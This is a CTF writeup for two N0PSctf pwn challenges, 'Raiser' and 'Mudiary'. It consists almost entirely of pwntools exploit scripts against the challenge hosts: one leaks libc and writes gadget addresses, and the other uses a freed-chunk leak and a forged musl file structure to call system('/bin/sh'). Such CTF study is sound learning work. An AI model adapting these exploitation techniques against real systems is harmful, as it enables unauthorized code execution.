N0PSctf Pwn Writeup

闲来无事打个比赛，ctftime 上随便挑的一个。

Raiser

from pwn import*
# The challenge host is passed as an argument to the bundled "./sc_Linux_x86_64"
# binary — presumably a connection helper shipped with the CTF; confirm before reuse.
r=process(["./sc_Linux_x86_64","nopsctf-3e1fa45a9b0d-raiser-1.chals.io"])
#r=process('./raiser')   # author's local alternative, left disabled
# Debug logging echoes every send/recv, which is what makes the prompt matching below auditable.
context.log_level='debug'

def show(offset):
	"""Walk the "show" menu path on the global tube ``r``.

	Answers the first "> " prompt with "1337" and the second with
	``str(offset)``; reads nothing back, the caller consumes the output.
	"""
	replies = ("1337", str(offset))
	for reply in replies:
		r.recvuntil("> ")
		r.sendline(reply)

def edit(content):
	"""Send ``str(content)`` at the first "> " prompt, then "0" at the next one.

	Two prompts are consumed per call; nothing is read back.
	"""
	answers = [str(content), "0"]
	while answers:
		r.recvuntil("> ")
		r.sendline(answers.pop(0))

def exit():
	"""Answer two "> " prompts with "0" and then "8192" (== str(0x2000)).

	NOTE: the name shadows the builtin ``exit`` for the rest of this script;
	kept as-is because the script body calls it by this name.
	"""
	prompt = "> "
	r.recvuntil(prompt)
	r.sendline("0")
	r.recvuntil(prompt)
	r.sendline("8192")  # identical to str(0x2000)

# Leak step: menu 1337 with offset 29, skip one line, then parse the next line
# as a decimal integer. int() raises ValueError if the line is not a number.
show(29)
r.recvline()
# 0x246000 is the author's offset from the leaked value to libc_base; it is
# specific to the challenge's libc build — verify against the actual library.
libc_base=int(r.recvline())-0x246000
success("libc_base: "+hex(libc_base))

# Nineteen zero entries, then four libc-relative values. The offsets are the
# writeup's constants; what each one points to is not shown on this page.
for i in range(19): edit(0)

edit(libc_base+0x28796)
edit(libc_base+0x28795)
edit(libc_base+0x1c041b)
edit(libc_base+0x552b0)

#gdb.attach(r)   # author's debugging hook, left disabled

# Script-local exit() helper (shadows the builtin): sends 0 and then 0x2000.
exit()

r.interactive()

Mudiary

from pwn import*
# Same "./sc_Linux_x86_64" helper as the first script, given the challenge host;
# presumably a connection wrapper — confirm before reuse.
r=process(["./sc_Linux_x86_64","nopsctf-b673cc3ca88b-mudiary-1.chals.io"])
#r=process(['./musl.so','./mudiary'])   # author's local alternative (musl loader + binary)
# Debug logging echoes every send/recv so the prompt matching below can be checked.
context.log_level='debug'

def new(size,content):
	"""Menu option 1 on the global tube ``r``: send ``str(size)``, then *content*.

	The first two answers go through ``sendline``; *content* is sent raw with
	``send`` (no newline appended), so the caller supplies its own terminator.
	"""
	def ask(answer, raw=False):
		r.recvuntil(": ")
		(r.send if raw else r.sendline)(answer)
	ask("1")
	ask(str(size))
	ask(content, raw=True)

def edit(idx,content):
	"""Menu option 2: select entry *idx*, announce ``len(content)+1`` as the
	length, then send *content* raw (``send``, no newline appended).

	Four ": " prompts are consumed per call.
	"""
	length = len(content) + 1
	for line in ("2", str(idx), str(length)):
		r.recvuntil(": ")
		r.sendline(line)
	r.recvuntil(": ")
	r.send(content)

def show(idx):
	"""Menu option 3: select entry *idx* for display.

	The second prompt is matched on a bare ":" (no trailing space), unlike
	the first; keep that distinction when editing.
	"""
	steps = [(": ", "3"), (":", str(idx))]
	for prompt, answer in steps:
		r.recvuntil(prompt)
		r.sendline(answer)

def delete(idx):
	"""Menu option 4: select entry *idx* for deletion.

	First prompt is matched on ": ", the second on a bare ":".
	"""
	recv, send = r.recvuntil, r.sendline
	recv(": ")
	send("4")
	recv(":")
	send(str(idx))

def exit():
	"""Send "1337" at the next ": " prompt.

	NOTE: shadows the builtin ``exit`` for the rest of this script; the
	script body does not call it, but the name is kept for fidelity.
	"""
	menu_choice = "1337"
	r.recvuntil(": ")
	r.sendline(menu_choice)

# Leak step: allocate one 0x18 entry, free it, then display it. The displayed
# value after the separator line is treated as a libc pointer.
new(0x18,"\n")

delete(0)

show(0)

r.recvuntil("------------------\n")
# Read up to the newline and pad with two zero bytes: u64 needs exactly 8 bytes,
# so this assumes a 6-byte leak — it raises otherwise. 0x9ee90 is the author's
# build-specific offset to libc_base; verify against the challenge's libc.
libc_base=u64(r.recvuntil("\n",drop=True)+p16(0))-0x9ee90
success("libc_base: "+hex(libc_base))

# libc-relative constants from the writeup (offsets tied to this libc build).
ofl_head=libc_base+0xa1158
system=libc_base+0x4419a

# Entry 0 is rewritten with two 8-byte values followed by "\n". NOTE: p64()
# yields bytes while "\n" is str — this concatenation only works on Python 2,
# which the whole script assumes.
edit(0,p64(ofl_head-0x18)+p64(libc_base+0xa1360)+"\n")

# Buffer layout built below: "/bin/sh" at offset 0, 0x2 at 0x28, 0x1 at 0x38,
# the system address at 0x48, zero-padded between fields. The structure it
# mirrors is not named on this page; the gdb hint further down references
# close_file, which is the author's only pointer to it.
fake_struct="/bin/sh"
fake_struct=fake_struct.ljust(0x28,"\x00")
fake_struct+=p64(0x2)
fake_struct=fake_struct.ljust(0x38,"\x00")
fake_struct+=p64(0x1)
fake_struct=fake_struct.ljust(0x48,"\x00")
fake_struct+=p64(system)

new(0x100,fake_struct+"\n")

# Fourteen further 0x18 allocations; the count is the author's and its reason
# is not recoverable from this page.
for i in range(14): new(0x18,"\n")

#gdb.attach(r,"b close_file")   # author's debugging hook, left disabled

# Final menu selection sent by hand rather than through new(); no further prompts are read.
r.recvuntil(": ")
r.sendline("1")

r.interactive()